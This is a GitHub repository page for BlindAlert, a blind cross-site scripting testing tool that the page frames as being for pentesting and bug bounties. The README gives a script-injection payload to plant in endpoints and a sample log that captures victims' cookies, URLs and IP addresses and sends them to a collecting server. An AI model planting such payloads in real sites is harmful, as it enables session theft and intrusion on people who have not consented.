Skip to content

mdhama/blindAlert

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

43 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

handle.php

handle.php

 
 

index.php

index.php

 
 

payload.js

payload.js

 
 

test3.yaml

test3.yaml

 
 

Repository files navigation

BlindAlert

BlindAlert

Easy Blind Cross-site Scripting testing tool.

Requirements

  • PHP >= 5.7
  • Running server or ngrok (access localhost over the internet)

Installation

Either you can install in your local system and access through the ngrok or install into a live server.

To install BlindAlert, simply clone the repo

git clone https://github.com/mdhama/blindAlert.git

To Run on local server

cd blindAlert
php -S localhost:80

Now open http://localhost in your browser.

Over the internet using ngrok

./ngrok http 80

Uses

  • Create a JS payload and start blindly putting into endpoints :-) e.g. "><script src="http://localhost"></script>
  • When it executes sucessfully, it creates an output file within the same project directory.

Example output file.txt:

origin: http://example
host: example
url: http://example/user/posts
referrer: http://example/user
user-agent: <user-agent>
cookies: <document.cookie>
ip: <ip_addess>

About

Simple pentesting tool to check Blind XSS

Topics

penetration-testing bug-bounty xss-vulnerability pentest-tool blind-xss

Resources

Readme

License

MIT license
Activity

Stars

7 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages